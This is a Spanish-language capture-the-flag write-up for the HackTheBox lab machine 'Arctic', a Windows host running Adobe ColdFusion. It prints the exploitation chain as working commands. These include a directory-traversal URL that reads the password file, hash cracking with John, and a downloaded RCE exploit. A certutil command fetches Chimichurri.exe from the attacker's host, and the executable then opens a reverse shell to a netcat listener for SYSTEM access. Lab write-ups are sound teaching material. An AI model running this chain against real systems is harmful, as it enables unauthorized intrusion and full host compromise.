Arctic

✍️ Autor: ch4p 🔍 Dificultad: Fácil 📅 Fecha de creación: 16/07/2024

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 10.10.10.11

para verificar la conectividad de red.

A continuación, realizamos el comando:

nmap -sC -sV 10.10.10.11

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Durante el escaneo se identificaron los siguientes puertos abiertos:

• Puerto 135 (MSRPC): Este puerto es utilizado por Microsoft Windows RPC (Remote Procedure Call). Puede ser un objetivo para ataques de enumeración, explotación de vulnerabilidades en versiones desactualizadas o abuso de privilegios a través de DCOM.

• Puerto 8500: Identificado con un servicio desconocido (fmtp?). Se recomienda realizar un escaneo más profundo para determinar su funcionalidad y verificar si está asociado con software vulnerable.

• Puerto 49154 (MSRPC): Otro puerto de Microsoft Windows RPC, comúnmente utilizado para comunicaciones internas del sistema. Puede ser investigado para determinar si existen configuraciones inseguras o vulnerabilidades explotables.

A continuación, se procederá a analizar cada uno de estos servicios en busca de posibles vectores de ataque.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p135,8500,49154 -v 10.10.10.11

para que nos proporcione más información sobre esos puertos específicamente.

A través del puerto 8500 corre una página web. Indagando un poco encontramos un panel de Login en el directorio /administrator. Es un panel de Adobe Coldfusion.

Buscamos exploits para explotarlo con Metasploit.

🚀 EXPLOTACIÓN

Adobe ColdFusion - Directory TraversalExploit Database

Vemos que es un Directory Traversal y nos sale la dirección comentada.

http://10.10.10.11/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

Vemos que la contraseña es un hash entonces con John vamos a crackearlo.

john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha1 hash

Tenemos la contraseña de admin por lo que nos logueamos.

Buscando más exploits encontramos un RCE.

Nos la descargamos.

searchsploit -m cfm/webapps/50057.py

Ejecutamos.

python3 50057.py

🔐 PRIVILEGIOS

Para escalar privilegios ya que WinPeas no funciona usamos esto.

https://github.com/bitsadmin/wesng

python3 wes.py system_info.txt -i "Elevation of Privilege" -e                                  

Se identificó un exploit que es el que vamos a usar para escalar privilegios.

Microsoft Windows - Tracing Registry Key ACL Privilege EscalationExploit Database

https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059%3A%20Chimichurri/Compiled

certutil.exe -urlcache -f http://10.10.14.14:8000/Chimichurri.exe c.exe

Nos ponemo en escucha mientras ejecutamos el archivo.

nc -lvnp 4444
c.exe 10.10.14.14 4444

Ya somos root.